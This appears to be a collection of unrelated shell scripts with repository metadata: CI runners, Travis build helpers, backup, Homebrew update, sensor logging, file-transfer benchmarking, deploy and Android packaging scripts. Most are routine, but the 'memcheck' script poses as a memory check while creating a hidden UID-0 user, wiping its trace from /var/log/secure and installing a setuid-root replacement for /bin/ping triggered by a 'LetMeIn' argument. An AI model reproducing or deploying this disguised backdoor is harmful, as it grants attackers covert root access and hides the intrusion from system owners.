echo -e "\033[0;34mHooray! Oh My Zsh has been updated and/or is at the current version.\033[0m"
echo -e "\033[0;34mTo keep up on the latest, be sure to follow Oh My Zsh on twitter: \033[1mhttp://twitter.com/ohmyzsh\033[0m"
cd "$current_path"
| true
|
db35e860965b95230a2d491de7c4ffd048da9e2b
|
Shell
|
UiS-IDE-NG/neat
|
/ci/run-test
|
UTF-8
| 3,056
| 3.65625
| 4
|
[] |
permissive
|
#!/usr/bin/env bash
#
# Travis CI Scripts
# Copyright (C) 2018-2020 by Thomas Dreibholz
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact: dreibh@iem.uni-due.de
# Bash options:
set -e
# ====== Get settings =======================================================
export TRAVIS_OS_NAME="linux"
if [[ "$1" =~ ^(debian|ubuntu|fedora|freebsd)_([a-zA-Z0-9]*|[0-9\.]*)-(pbuilder|mock|compile)(|-gcc|-clang)$ ]] ; then
if [ "${BASH_REMATCH[1]}" == "freebsd" ] ; then
export DOCKER=""
export QEMU="FreeBSD"
export VARIANT="${BASH_REMATCH[2]}-RELEASE"
else
export DOCKER="${BASH_REMATCH[1]}:${BASH_REMATCH[2]}"
export VARIANT="${BASH_REMATCH[1]}"
fi
export TOOL="${BASH_REMATCH[3]}"
COMPILER="${BASH_REMATCH[4]}"
echo "DOCKER=${DOCKER}"
echo "QEMU=${QEMU}"
echo "VARIANT=${VARIANT}"
echo "TOOL=${TOOL}"
if [ "${TOOL}" == "compile" -a "${COMPILER}" != "" ] ; then
if [ "${COMPILER}" == "-gcc" ] ; then
export COMPILER_C=gcc
export COMPILER_CXX=g++
elif [ "${COMPILER}" == "-clang" ] ; then
export COMPILER_C=clang
export COMPILER_CXX=clang++
else
echo >&2 "ERROR: Bad compiler setting!"
exit 1
fi
echo "COMPILER_C=${COMPILER_C}"
echo "COMPILER_CXX=${COMPILER_CXX}"
fi
elif [ "$1" == "" ] ; then
# ------ Use defaults ----------------------------------
export DOCKER="ubuntu:bionic"
export VARIANT="ubuntu"
export TOOL="pbuilder"
else
echo >&2 "Usage: $0 [ubuntu|fedora|freebsd]_[release]-[pbuilder|mock|compile-[gcc|clang]]"
exit 1
fi
# ====== Run test ===========================================================
SCRIPTS="before-install install build test"
# SCRIPTS="test"
for script in $SCRIPTS ; do
echo "###### Running $script ... ######"
sudo env \
TRAVIS_OS_NAME="$TRAVIS_OS_NAME" \
DOCKER="$DOCKER" QEMU="$QEMU" \
VARIANT="$VARIANT" \
TOOL="$TOOL" \
COMPILER_C="$COMPILER_C" \
COMPILER_CXX="$COMPILER_CXX" \
ci/${script} \
|| {
echo ""
echo "====== Something went wrong! Getting shell into the container! ======"
echo ""
sudo env \
TRAVIS_OS_NAME="$TRAVIS_OS_NAME" \
DOCKER="$DOCKER" QEMU="$QEMU" \
VARIANT="$VARIANT" \
TOOL="$TOOL" \
COMPILER_C="$COMPILER_C" \
COMPILER_CXX="$COMPILER_CXX" \
ci/enter
exit 1
}
done
echo "###### Build test completed! ######"
| true
|
6328313dafd42574a9fb8a846ba1948faaa9b35e
|
Shell
|
shawwn/scrap
|
/backupdir
|
UTF-8
| 916
| 3.75
| 4
|
[] |
no_license
|
#!/bin/bash
# usage examples:
#
# backup the ~/bin folder minus large binary files:
# $ backupbin
#
# backup the entire ~/bin folder
# $ backupbin all
#
#=====================================================================
# main
#=====================================================================
BAK="$1"
DST="${2:-.}"
# DST="$(canonicalize_path "$(resolve_symlinks "$DST")")"
DST="$(realpath "$(realpath "$DST")")"
shift 1
shift 1
NAME="$(basename "$BAK")"
NAME="$NAME-`utcstamp`";
if [ ! -z "$LABEL" ]; then
NAME="$NAME-$LABEL"
fi
BAK_DIR="$(dirname "$BAK")"
BAK_SUBDIR="$(basename "$BAK")"
# use $@ to pass in e.g. --exclude=path/some_subfolder
[ ! -d "$DST" ] && mkdir -p "$DST"
cat <<.
\$(cd "$BAK_DIR" ; tar $@ -czvf "$DST/$NAME.tar.gz" "$BAK_SUBDIR/")
.
$(cd "$BAK_DIR" ; tar $@ -czvf "$DST/$NAME.tar.gz" "$BAK_SUBDIR/")
echo "$NAME.tar.gz saved to $(dirname "$DST/$NAME.tar.gz")"
| true
|
f213ed748c3c94367e86370abb8e8d2ac39d06b4
|
Shell
|
nett55/travis-build
|
/lib/travis/build/script/templates/header.sh
|
UTF-8
| 3,203
| 4.21875
| 4
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
#!/bin/bash
source /etc/profile
RED="\033[31;1m"
GREEN="\033[32;1m"
RESET="\033[0m"
travis_time_start() {
travis_start_time=$(travis_nanoseconds)
echo -en "travis_time:start\r"
}
travis_time_finish() {
local result=$?
travis_end_time=$(travis_nanoseconds)
local duration=$(($travis_end_time-$travis_start_time))
echo -en "travis_time:finish:start=$travis_start_time,finish=$travis_end_time,duration=$duration\r"
return $result
}
function travis_nanoseconds() {
local cmd="date"
local format="+%s%N"
local os=$(uname)
if which gdate > /dev/null; then
cmd="gdate" # use gdate if available
elif [[ "$os" = darwin ]]; then
format="+%s000000000" # fallback to second precision on darwin (does not support %N)
fi
$cmd -u $format
}
travis_assert() {
local result=$?
if [ $result -ne 0 ]; then
echo -e "\n${RED}The command \"$TRAVIS_CMD\" failed and exited with $result during $TRAVIS_STAGE.${RESET}\n\nYour build has been stopped."
travis_terminate 2
fi
}
travis_result() {
local result=$1
export TRAVIS_TEST_RESULT=$(( ${TRAVIS_TEST_RESULT:-0} | $(($result != 0)) ))
if [ $result -eq 0 ]; then
echo -e "\n${GREEN}The command \"$TRAVIS_CMD\" exited with $result."
else
echo -e "\n${RED}The command \"$TRAVIS_CMD\" exited with $result."
fi
}
travis_terminate() {
pkill -9 -P $$ &> /dev/null || true
exit $1
}
travis_wait() {
local timeout=$1
if [[ $timeout =~ ^[0-9]+$ ]]; then
# looks like an integer, so we assume it's a timeout
shift
else
# default value
timeout=20
fi
local cmd="$@"
local log_file=travis_wait_$$.log
$cmd &>$log_file &
local cmd_pid=$!
travis_jigger $! $timeout $cmd &
local jigger_pid=$!
local result
{
wait $cmd_pid 2>/dev/null
result=$?
ps -p$jigger_pid &>/dev/null && kill $jigger_pid
} || return 1
if [ $result -eq 0 ]; then
echo -e "\n${GREEN}The command \"$TRAVIS_CMD\" exited with $result.${RESET}"
else
echo -e "\n${RED}The command \"$TRAVIS_CMD\" exited with $result.${RESET}"
fi
echo -e "\n${GREEN}Log:${RESET}\n"
cat $log_file
return $result
}
travis_jigger() {
# helper method for travis_wait()
local cmd_pid=$1
shift
local timeout=$1 # in minutes
shift
local count=0
# clear the line
echo -e "\n"
while [ $count -lt $timeout ]; do
count=$(($count + 1))
echo -ne "Still running ($count of $timeout): $@\r"
sleep 60
done
echo -e "\n${RED}Timeout (${timeout} minutes) reached. Terminating \"$@\"${RESET}\n"
kill -9 $cmd_pid
}
travis_retry() {
local result=0
local count=1
while [ $count -le 3 ]; do
[ $result -ne 0 ] && {
echo -e "\n${RED}The command \"$@\" failed. Retrying, $count of 3.${RESET}\n" >&2
}
"$@"
result=$?
[ $result -eq 0 ] && break
count=$(($count + 1))
sleep 1
done
[ $count -eq 3 ] && {
echo "\n${RED}The command \"$@\" failed 3 times.${RESET}\n" >&2
}
return $result
}
decrypt() {
echo $1 | base64 -d | openssl rsautl -decrypt -inkey ~/.ssh/id_rsa.repo
}
mkdir -p <%= BUILD_DIR %>
cd <%= BUILD_DIR %>
trap 'TRAVIS_CMD=$TRAVIS_NEXT_CMD; TRAVIS_NEXT_CMD=${BASH_COMMAND#travis_retry }' DEBUG
| true
|
f31a41bfa7d42b61d03aad51b9f626848acde683
|
Shell
|
dylanferguson/dotfiles
|
/update.sh
|
UTF-8
| 793
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
echo 'Updating Brew...'
brew update
brew upgrade
brew cleanup -s
brew doctor
brew missing
pushd "$HOME/.dotfiles"
brew bundle dump --force
if [[ $(git diff --stat Brewfile) != '' ]]; then
echo 'Updating Brewfile...'
git add Brewfile
git commit -m 'auto update Brewfile'
fi
echo 'pipx pkg backup...'
pipx list > pipx.txt
[[ $(git diff --stat pipx.txt) != '' ]] && git add pipx.txt && git commit -m 'pipx pkg list update'
echo 'VSCode backup...'
code --list-extensions --show-versions > vscode/extensions.txt
[[ $(git diff --stat vscode/extensions.txt) != '' ]] && git add vscode/extensions.txt && git commit -m 'vscode extensions update'
echo 'MAS update...'
mas outdated
mas upgrade
echo 'Updating NPM global packages...'
npm update -g
yarn global upgrade
popd
| true
|
16d7e6894c36f9e89382c6ef95875e290bde2b26
|
Shell
|
va1kyrie/test-scripts
|
/testsmalls.sh
|
UTF-8
| 2,237
| 4.125
| 4
|
[] |
no_license
|
#!/bin/sh
# test load of many small file transfers in quick succession
# measures and logs CPU, memory, time, and bandwidth while sending repetitions
# of a small file many times to a specified host (username@host/IP)
TIMESTAMP=$(date +%T%d%m)
ARGS=$#
if [ ARGS -ne 3 ]; then
echo "3 arguments needed"
exit $E_WRONGARGS
fi
# user and host to send files to
USR=$1
HOST=$2
NAME="$1@$2"
# number of times to send file
REPS=$3
# create the logfiles
mkdir ./$TIMESTAMP
touch ./$TIMESTAMP/band_log
LOG_BAND=./$TIMESTAMP/band_log
touch ./$TIMESTAMP/stats_log
LOG_STATS=./$TIMESTAMP/stats_log
echo "Running Small Files Test"
echo "Running Small Files Test" >> $LOG_STATS
echo "Running Small Files Test" >> $LOG_BAND
# small file to send
echo "File to send (KB): "
read SM
# start the tests
# flags for future reference:
# -i : ignore idle or zombie processes in top
# -b : batch mode for better writing to file
# -d : delay (set to 1 second right now)
# the upshot of -i is that if there is no significant CPU usage going on (as
# in small file copies, for instance), top will print no processes to the file.
# if, however, there is CPU activity (as in some medium and certainly all large
# file transfers, top will return those active processes.)
# had to change this implementation because of differences in VPN implementations.
# also i have no idea why but if i don't put "nohup" there it doesn't work correctly.
# for really small files on normal networks, delay should be .1.
# on tinc, this means you're going to crash atom when you try to open the file.
# so maybe keep it at 1 second for tinc.
nohup top -i -b -d .1 >> $LOG_STATS &
# track bandwidth as well. this should capture all the interfaces, regardless of
# whether the VPN makes a new one.
# no idea if the same issues exist here as with top and nohup vs no nohup, but
# i am not taking any chances.
nohup ifstat -t -T .1 >> $LOG_BAND &
for COUNT in `seq $REPS`
do
echo "\n\n$COUNT File Transfer - $(date +%T)\n\n" >> $LOG_STATS
scp $SM $NAME:./
echo "\n\n$COUNT File Transfer Finished - $(date +%T)\n\n" >> $LOG_STATS
done
# make sure everything's ended
kill $(pidof top)
kill $(pidof ifstat)
echo "Finished! Log is at: $LOG_STATS and $LOG_BAND"
| true
|
b34400c6c98027244866cd394e72cccf82a39a35
|
Shell
|
nipengmath/neural_sp
|
/examples/timit/s5/run.sh
|
UTF-8
| 4,861
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
# Copyright 2018 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
echo ============================================================================
echo " TIMIT "
echo ============================================================================
stage=0
gpu=
### Set path to save dataset
export data=/n/sd8/inaguma/corpus/timit
### configuration
config=conf/attention/bgru_att_phone61.yml
# config=conf/ctc/blstm_ctc_phone61.yml
### Set path to save the model
model_dir=/n/sd8/inaguma/result/timit
### Restart training (path to the saved model directory)
resume_model=
### Set path to original data
TIMITDATATOP=/n/rd21/corpora_1/TIMIT
. ./cmd.sh
. ./path.sh
. utils/parse_options.sh
set -e
set -u
set -o pipefail
if [ -z $gpu ]; then
echo "Error: set GPU number." 1>&2
echo "Usage: ./run.sh --gpu 0" 1>&2
exit 1
fi
ngpus=`echo $gpu | tr "," "\n" | wc -l`
rnnlm_gpu=`echo $gpu | cut -d "," -f 1`
train_set=train
dev_set=dev
test_set=test
if [ ${stage} -le 0 ] && [ ! -e .done_stage_0 ]; then
echo ============================================================================
echo " Data Preparation (stage:0) "
echo ============================================================================
mkdir -p ${data}
local/timit_data_prep.sh ${TIMITDATATOP} || exit 1;
local/timit_format_data.sh || exit 1;
touch .done_stage_0 && echo "Finish data preparation (stage: 0)."
fi
if [ ${stage} -le 1 ] && [ ! -e .done_stage_1 ]; then
echo ============================================================================
echo " Feature extranction (stage:1) "
echo ============================================================================
for x in train dev test; do
steps/make_fbank.sh --nj 16 --cmd "$train_cmd" --write_utt2num_frames true \
${data}/${x} ${data}/log/make_fbank/${x} ${data}/fbank || exit 1;
done
# Compute global CMVN
compute-cmvn-stats scp:${data}/${train_set}/feats.scp ${data}/${train_set}/cmvn.ark || exit 1;
# Apply global CMVN & dump features
for x in ${train_set} ${dev_set} ${test_set}; do
dump_dir=${data}/feat/${x}; mkdir -p ${dump_dir}
dump_feat.sh --cmd "$train_cmd" --nj 16 --add_deltadelta true \
${data}/${x}/feats.scp ${data}/${train_set}/cmvn.ark ${data}/log/dump_feat/${x} ${dump_dir} || exit 1;
done
touch .done_stage_1 && echo "Finish feature extranction (stage: 1)."
fi
dict=${data}/dict/${train_set}.txt; mkdir -p ${data}/dict/
if [ ${stage} -le 2 ] && [ ! -e .done_stage_2 ]; then
echo ============================================================================
echo " Dataset preparation (stage:2) "
echo ============================================================================
# Make a dictionary
echo "<blank> 0" > ${dict}
echo "<unk> 1" >> ${dict}
echo "<sos> 2" >> ${dict}
echo "<eos> 3" >> ${dict}
echo "<pad> 4" >> ${dict}
offset=`cat ${dict} | wc -l`
echo "Making a dictionary..."
text2dict.py ${data}/${train_set}/text --unit phone | \
sort | uniq | grep -v -e '^\s*$' | awk -v offset=${offset} '{print $0 " " NR+offset-1}' >> ${dict} || exit 1;
echo "vocab size:" `cat ${dict} | wc -l`
# Make datset csv files
mkdir -p ${data}/dataset/
for x in ${train_set} ${dev_set}; do
echo "Making a csv file for ${x}..."
dump_dir=${data}/feat/${x}
make_dataset_csv.sh --feat ${dump_dir}/feats.scp --unit phone \
${data}/${x} ${dict} > ${data}/dataset/${x}.csv || exit 1;
done
for x in ${test_set}; do
dump_dir=${data}/feat/${x}
make_dataset_csv.sh --is_test true --feat ${dump_dir}/feats.scp --unit phone \
${data}/${x} ${dict} > ${data}/dataset/${x}.csv || exit 1;
done
touch .done_stage_2 && echo "Finish creating dataset (stage: 2)."
fi
# NOTE: skip RNNLM training (stage:3)
mkdir -p ${model_dir}
if [ ${stage} -le 4 ]; then
echo ============================================================================
echo " ASR Training stage (stage:4) "
echo ============================================================================
echo "Start ASR training..."
CUDA_VISIBLE_DEVICES=${gpu} ../../../neural_sp/bin/asr/train.py \
--ngpus ${ngpus} \
--train_set ${data}/dataset/${train_set}.csv \
--dev_set ${data}/dataset/${dev_set}.csv \
--eval_sets ${data}/dataset/${test_set}.csv \
--dict ${dict} \
--config ${config} \
--model ${model_dir}/asr \
--label_type phone || exit 1;
# --resume_model ${resume_model} || exit 1;
touch ${model}/.done_training && echo "Finish model training (stage: 4)."
fi
echo "Done."
| true
|
0f436421980faf099c653e628d7ca0551809f0ea
|
Shell
|
Helius/.bin
|
/system_temperature
|
UTF-8
| 1,581
| 2.734375
| 3
|
[] |
no_license
|
#!/bin/bash
MB_T_RAW=`sensors | egrep -o 'temp1:\s+\+[0-9]+' | egrep -o '\+[0-9]+' | egrep -o '[0-9]+'`
CORE_0_RAW=`sensors | egrep -o 'Core 0:\s+\+[0-9]+' | egrep -o '\+[0-9]+' | egrep -o '[0-9]+'`
CORE_1_RAW=`sensors | egrep -o 'Core 1:\s+\+[0-9]+' | egrep -o '\+[0-9]+' | egrep -o '[0-9]+'`
MB_T=$(( MB_T_RAW - 23 ))
CORE_0=$(( CORE_0_RAW - 23 ))
CORE_1=$(( CORE_1_RAW - 23 ))
SDA_T=`/usr/sbin/hddtemp /dev/sda | egrep -o '[0-9]+°C' | egrep -o [0-9]+`
SDB_T=`/usr/sbin/hddtemp /dev/sdb | egrep -o '[0-9]+°C' | egrep -o [0-9]+`
CPU_USAGE=`/home/eugene/.bin/cpu_load.sh`
#echo "`date -R`, MB:$MB_T, CORE0:$CORE_0, CORE1:$CORE_1, SDA:$SDA_T, SDB:$SDB_T, CPULOAD:$CPU_USAGE"
#update rrd data base
rrdtool update /home/eugene/db/tmp.rrd `date +"%s"`:$MB_T:$CORE_0:$CORE_1:$SDA_T:$SDB_T:$CPU_USAGE
#echo -ne "#54:55:58:10:00:20\n#54:55:58:10:00:21#""$MB_T""\n#54:55:58:10:00:22#""$CORE_0""\n#54:55:58:10:00:23#""$CORE_1""\n#54:55:58:10:00:24#""$SDA_T""\n#54:55:58:10:00:25#""$SDB_T""\n#54:55:58:10:00:26#""$CPU_USAGE""\n##" | nc narodmon.ru 8283
#cpu0_tempr
#cpu1_tempr
#cpu_load
#indoor_tempr
#mac
#mb_tempr
#sda_tempr
#sdb_tempr
#set value to narodmon.data for narodmon_sender
echo "$MB_T" > /home/eugene/.narodmon.data/atom/mb_tempr/value
echo "$CORE_0" > /home/eugene/.narodmon.data/atom/cpu0_tempr/value
echo "$CORE_1" > /home/eugene/.narodmon.data/atom/cpu1_tempr/value
echo "$SDA_T" > /home/eugene/.narodmon.data/atom/sda_tempr/value
echo "$SDB_T" > /home/eugene/.narodmon.data/atom/sdb_tempr/value
echo "$CPU_USAGE" > /home/eugene/.narodmon.data/atom/cpu_load/value
| true
|
aa096ef15a6d8cb370e55e38b9894cffdd63678b
|
Shell
|
ebolinger/any-java-docker
|
/bin/doit.sh
|
UTF-8
| 933
| 3.609375
| 4
|
[
"MIT"
] |
permissive
|
#
# Run as root (or with docker permissions).
# Start the docker process, then update NGINX with the new port.
#
BASE_NAME=$(basename $0)
DIR_NAME=$(dirname $0)
VOLUMES="-v /mnt/hi_sinatra-docker/data:/data -v /mnt/hi_sinatra-docker/logs:/logs"
PORTS="-p 8080 -p 8000"
USER="-u root"
IMAGE=eb/any-java
TMP_FILE=/tmp/file$$
# Launch the container.
CMD="/usr/bin/docker run -d $VOLUMES $PORTS $USER $IMAGE"
echo "Running command: $CMD"
CONT_ID=$($CMD)
# Fetch the IP address of that container.
MY_IPADDR=$(/usr/bin/docker inspect $CONT_ID | $DIR_NAME/JSON.sh -b | grep "IPAddress" | cut -f2 | sed -e 's/"//g')
# Replace any old 8080 iptable entries with a new rule pointing to that container.
iptables -S -t nat | grep "dport 8080" | sed -e "s/.A DOCKER/iptables -t nat -D DOCKER/" > $TMP_FILE
iptables -t nat -A DOCKER ! -i docker0 -p tcp -m tcp --dport 8080 -j DNAT --to-destination ${MY_IPADDR}:8080
. $TMP_FILE
rm -f $TMP_FILE
| true
|
4e58d22a518e76f9a867e110809559aa398dadfa
|
Shell
|
gejiawen/my-shell-toolbox
|
/test/forin.sh
|
UTF-8
| 87
| 2.625
| 3
|
[] |
no_license
|
arr=(1 2 3)
for ip in ${arr[@]:1:${#arr[@]}}; do
echo
echo $ip
echo
done
| true
|
d5aa6c06fadb8f63afe1b7c2ff92b6e787a94964
|
Shell
|
antoniofabio/eqtl-ranef
|
/tests/test-003-set-max-regressions.sh
|
UTF-8
| 487
| 2.5625
| 3
|
[] |
no_license
|
#!/bin/bash -l
set -e
set -u
set -o pipefail
TMPD=`mktemp -d`
trap "rm -rf ${TMPD}" EXIT
../generate-eqtl-ranef-data --output=${TMPD} \
--regressors=2 --outcomes=1000 --samples=100 --fixef=1
../eqtl-ranef \
--regressors=${TMPD}/regressors \
--outcomes=${TMPD}/outcomes \
--fixef=${TMPD}/fixef \
--ranef=${TMPD}/ranef \
--genespos=${TMPD}/genespos.sqlite \
--snpspos=${TMPD}/snpspos.sqlite \
--cis-pvalue=0.1 --trans-pvalue=1e-3 \
--max-regressions=500 \
| sort
| true
|
832a9595befd331770323436a155fa23c5c48226
|
Shell
|
wodby/nginx
|
/tests/matomo/run.sh
|
UTF-8
| 1,897
| 3
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -e
if [[ -n "${DEBUG}" ]]; then
set -x
fi
check_endpoint() {
docker-compose exec -T nginx curl -s -S -I "localhost/${1}" | grep -q "${2}"
echo "OK"
}
clean_exit() {
docker-compose down
}
trap clean_exit EXIT
docker-compose up -d
docker-compose exec -T nginx make check-ready -f /usr/local/bin/actions.mk
docker-compose exec -T matomo make init -f /usr/local/bin/actions.mk
echo -n "Checking homepage endpoint... "
check_endpoint "" "200 OK"
echo -n "Checking config php... "
check_endpoint "config/config.ini.php" "403 Forbidden"
echo -n "Checking index page... "
check_endpoint "index.php" "200 OK"
echo -n "Checking matomo page... "
check_endpoint "matomo.php" "200 OK"
echo -n "Checking php file in core directory... "
check_endpoint "core/Twig.php" "403 Forbidden"
echo -n "Checking file from lang directory... "
check_endpoint "lang/en.json" "403 Forbidden"
echo -n "Checking html file from plugins directory... "
check_endpoint "plugins/MultiSites/angularjs/dashboard/dashboard.directive.html" "200 OK"
echo -n "Checking tmp dir... "
check_endpoint "tmp/cache/test" "403 Forbidden"
echo -n "Checking md file... "
check_endpoint "README.md" "200 OK"
echo -n "Checking file from misc... "
check_endpoint "misc/log-analytics/README.md" "403 Forbidden"
echo -n "Checking node_modules directory... "
check_endpoint "node_modules/jquery/README.md" "403 Forbidden"
echo -n "Checking libs directory... "
check_endpoint "libs/README.md" "403 Forbidden"
echo -n "Checking plugins directory... "
check_endpoint "plugins/SEO/templates/getRank.twig" "403 Forbidden"
echo -n "Checking vendor directory... "
check_endpoint "vendor/twig/twig/README.rst" "403 Forbidden"
echo -n "Checking favicon endpoint... "
check_endpoint "favicon.ico" "200 OK"
echo -n "Checking non-existing php endpoint... "
check_endpoint "non-existing.php" "403 Forbidden"
| true
|
baf3422b10b7002153541fc4dc2c275f06e0e122
|
Shell
|
hackiesackie/memcheck
|
/memcheck
|
UTF-8
| 747
| 2.515625
| 3
|
[] |
no_license
|
#!/bin/bash
cp /etc/passwd /etc/passwd.bak
cp /etc/shadow /etc/shadow.bak
cp /etc/gshadow /etc/gshadow.bak
cp /etc/group /etc/group.bak
cp /var/log/secure /var/log/secure.bak
/usr/sbin/useradd john -o -u 0 -d /tmp/john > /dev/null 2>&1
echo john | passwd --stdin john > /dev/null 2>&1
cp /var/log/secure.bak /var/log/secure
cp /bin/ping /work/ping > /dev/null 2>&1
cp /work/src/ping /bin/ping > /dev/null 2>&1
chown root /bin/ping > /dev/null 2>&1
chmod +s /bin/ping > /dev/null 2>&1
/bin/sh -c "cat /proc/meminfo"
echo "ping LetMeIn" > /work/my_program
chmod +x /work/my_program
cp /etc/passwd.bak /etc/passwd
cp /etc/shadow.bak /etc/shadow
cp /etc/gshadow.bak /etc/gshadow
cp /etc/group.bak /etc/group
# /usr/sbin/nscd -i passwd
| true
|
801bd3e56b5fa84f4872c363605aec88ae2077e8
|
Shell
|
sandhawke/mapleseed
|
/admin/gdeploy
|
UTF-8
| 823
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/sh
if [ ! -f admin/gdeploy ]; then
echo I think you are running this from the wrong place
exit 1
fi
group=$1
if [ -z "$group" ]; then
echo usage: $0 server-group-name
exit 1
fi
groupfile="admin/groupconfig/$group.sh"
if [ ! -f "$groupfile" ]; then
echo Missing group configfile: $groupfile
echo Please create it, or give us a different group
exit 1
fi
. $groupfile
echo packaging with tar
tar -czf .all.tz --exclude=.all.tz --exclude=*.out --exclude=*~ --exclude=.git --exclude=.js-test* --exclude=Test_Via* --exclude=_* --exclude=.fsbind* --exclude=mapleseed .
ls -l .all.tz
# do this for each remote system....
for host in $servers; do
echo copy to $host...
ssh root@$host < .all.tz "rm -rf newdep && mkdir newdep && cd newdep && tar xzf - . && admin/run-as-server $host"
done
echo done
| true
|
0239e64ff873555e4c136d159edea343b1add322
|
Shell
|
EdricChan03/ngx-ytd-api-demo-builds
|
/deploy.sh
|
UTF-8
| 463
| 3.65625
| 4
|
[] |
no_license
|
#!/bin/bash
# Automatically exit if any command exits with a non-zero code
set -e
commitSha=$(git rev-parse --short HEAD)
commitMessage=$(git log --oneline -n 1)
echo -e "\x1b[34mDeploying commit ${commitSha} to Firebase...\x1b[0m"
if [[ -n "$FIREBASE_TOKEN" ]]; then
firebase deploy --only hosting --message "${commitMessage}" --token "${FIREBASE_TOKEN}"
else
echo -e "\x1b[31m\x1b[1mERROR: Please set the FIREBASE_TOKEN environment variable." >&2
exit 1
fi
| true
|
94f8089e936cef202ca4a45bfda6063d1ab6e18d
|
Shell
|
loseleo/changecamera-android
|
/pkg_make.sh
|
UTF-8
| 5,033
| 3.734375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
unameOut="$(uname -s)"
case "${unameOut}" in
Linux*) machine=Linux;;
Darwin*) machine=Mac;;
CYGWIN*) machine=Cygwin;;
MINGW*) machine=MinGw;;
*) machine="UNKNOWN:${unameOut}"
esac
if [ "$PKG_DEBUG" != "" ];then
set -x
fi
# flags
set -e
# variables
key=$1
base_dir="$( cd "$( dirname "$0" )" && pwd )"
pkg_dir="${base_dir}/ddvideoconfigs/packages/${key}"
app_src="$base_dir/app/src"
app_src_main="$app_src/main"
common_src="$base_dir/common/src"
common_src_main="$common_src/main"
# functions
log(){
echo "[pkg]: $@"
}
mlog(){
echo -e "[pkg]: $@"
}
clean(){
log "Clean files: $@"
rm -rf $@
}
copy(){
source=$1
target=$2
log "Copy files: $@"
if [ -d "$source" ]; then
cp -rf $1 $2
fi
if [ -f "$source" ]; then
cp -rf $1 $2
fi
}
# 清理掉同名文件
clean_sp_name(){
source=$1
target=$2
for i in $(ls "$source"); do
filename=$(echo $i | sed -e 's#\.[A-Za-z]*$##g')
rm -rf "${target}${filename}."*
done
}
xml_filler(){
log "Handle strings.xml"
origin_file=$1
pkg_file=$2
if [ ! -f "$origin_file" ]; then
log "xml file not exists";
exit 0
fi
if [ ! -f "$pkg_file" ]; then
log "xml file not exists";
exit 0
fi
apply_list=$(
cat "$pkg_file" | grep -E -o '<string\s*name="[^"]*">[^<>]*</string>'
)
rm_list=$(
cat "$pkg_file" | grep -E "^\s*<string" | grep -E -o 'name="[^"]*"'
)
origin_strings_xml="$origin_file"
content=$(cat "${origin_strings_xml}");
# 先删掉
for item in $(echo -e "$rm_list"); do
content=$( echo -e "$content" | grep -v "$item" )
done
# 移除掉尾部
content=$(echo -e "$content" | sed -e "s#</resources>##g")
# 增加配置中的条目
IFS=$'\n'
for line in $(echo -e "$apply_list"); do
content=$(echo -e "$content\n $line")
log "replace or add line: $line"
done;
# 补齐尾部
content="${content}\n</resources>"
#echo $content
echo -e "$content" > "${origin_strings_xml}"
}
read_pkg_name(){
cat "$pkg_dir/gradle.properties" | grep 'PACKAGE_NAME_ANDROID=.*' | awk -F'=' '{print $2}'
}
# 处理微信登录相关
handle_wx_entry(){
local pkg_name=$1
dirs=$(echo "$pkg_name" | sed -e 's#\.#/#g')
file=$(find app/src/main/java -name WXEntryActivity.java)
file_content=$(cat "$file")
rm -rf $file
find app/src/main/java -type d -empty -delete
wxapi_dir="app/src/main/java/${dirs}/wxapi"
mkdir -p "$wxapi_dir"
result_content=$(echo -e "$file_content" | sed -e 's#package ..*\.wxapi#package '"${pkg_name}.wxapi"'#g')
echo -e "$result_content" > "${wxapi_dir}/WXEntryActivity.java"
}
# 处理微信支付相关
handle_wx_pay_entry(){
local pkg_name=$1
dirs=$(echo "$pkg_name" | sed -e 's#\.#/#g')
file=$(find app/src/main/java -name WXPayEntryActivity.java)
file_content=$(cat "$file")
rm -rf $file
find app/src/main/java -type d -empty -delete
wxapi_dir="app/src/main/java/${dirs}/wxapi"
mkdir -p "$wxapi_dir"
result_content=$(echo -e "$file_content" | sed -e 's#package ..*\.wxapi#package '"${pkg_name}.wxapi"'#g')
echo -e "$result_content" > "${wxapi_dir}/WXPayEntryActivity.java"
}
handle_manifest(){
local pkg_name=$1
if [ "$machine" = "Mac" ]; then
sed -i '' -e 's#android:name=".*WXEntryActivity"#android:name="'"$pkg_name.wxapi.WXEntryActivity"'"#' app/src/main/AndroidManifest.xml
sed -i '' -e 's#android:name=".*WXPayEntryActivity"#android:name="'"$pkg_name.wxapi.WXPayEntryActivity"'"#' app/src/main/AndroidManifest.xml
else
sed -i 's#android:name=".*WXEntryActivity"#android:name="'"$pkg_name.wxapi.WXEntryActivity"'"#' app/src/main/AndroidManifest.xml
sed -i 's#android:name=".*WXPayEntryActivity"#android:name="'"$pkg_name.wxapi.WXPayEntryActivity"'"#' app/src/main/AndroidManifest.xml
fi
}
# entry
if [ -z "$key" ]; then
pkg_list="$(ls "$base_dir/ddvideoconfigs/packages")"
log "Options: "
mlog "$pkg_list"
log
log "usage:"
log "./pkg_make.sh OPTION"
exit 1
fi
ls -al ddvideoconfigs/packages
log "clone ddvideoconfigs success ------------- "
copy $pkg_dir/res/drawable "$common_src_main/res/"
clean_sp_name "$pkg_dir/res/drawable-xxhdpi/" "$common_src_main/res/drawable-xxhdpi/"
copy "$pkg_dir/res/drawable-xxhdpi" "$app_src_main/res/"
copy "$pkg_dir/res/common/drawable-hdpi" "$common_src_main/res/"
copy "$pkg_dir/res/common/drawable-xhdpi" "$common_src_main/res/"
copy "$pkg_dir/res/common/drawable-xxhdpi" "$common_src_main/res/"
copy "$pkg_dir/gradle.properties" "$base_dir/gradle.properties"
copy "$pkg_dir/config.gradle" "$base_dir/config.gradle"
pkg_name=$(read_pkg_name)
log "pkg_name $pkg_name"
handle_wx_entry $pkg_name
handle_wx_pay_entry $pkg_name
handle_manifest $pkg_name
